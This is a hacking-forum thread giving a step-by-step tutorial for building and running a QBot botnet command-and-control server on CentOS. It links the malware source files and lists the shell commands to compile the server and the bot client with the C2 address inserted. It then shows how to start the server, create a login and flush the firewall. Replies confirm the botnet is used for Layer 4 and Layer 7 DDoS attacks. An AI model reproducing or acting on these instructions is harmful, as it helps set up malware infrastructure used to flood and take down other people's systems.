ALERT!
Click here to register with a few steps and explore all our cool stuff we have to offer!
Home
Upgrade
Credits
Help
Search
Awards
Achievements
 3941

TUTORIAL HOW TO SETUP QBOT BOTNET

by 1microfix - 11-28-2018 - 01:09 AM
#1
You need CentOS 6 and this files https://www.sendspace.com/file/ub9cuv
1st Step: Edit the 0.0.0.0 inside the client.c file make sure to replace all.  

2nd Step: 
Dependencies First
and make sure we 
got everything 
updated.    
[root@Hostname ~]# yum install python-paramiko nano screen gcc perl wget lbzip unzip -y

3rd Step: We have to compile the server side.
[root@Hostname ~]# gcc server.c -o server -pthread

4th Step: Compile the client side.
[root@Hostname ~]# python cc7.py client.c [SERVER IP]

5th Step: Now We Have To Screen The Server.
[root@Hostname ~]# screen ./server 23 1 [PORT OF CHOOSING] Hint: i used 1337
NOW PRESS CRTL - A+D

6th Step: Create A Login.
[root@Hostname ~]# echo root root1337 >>login.txt

7th Step: Last Thing To Make Sure Its Running.

[root@Hostname ~]# iptables -F

Now goto putty and login with the Your ip and port and make sure its set up on raw instead ssh.
Reply
#2
Simple and sweet basic guide, thanks man
Reply
#3
can qbot ddos? This is useful if i can use that feature haha
Reply
#4
(02-02-2019 - 05:06 AM)Rabb2269 Wrote: can qbot ddos? This is useful if i can use that feature haha
Yeah. It does use DDoS attacks. Mostly Layer 7 and Layer 4. Nothing else (I think)
Reply

Users browsing: 2 Guest(s)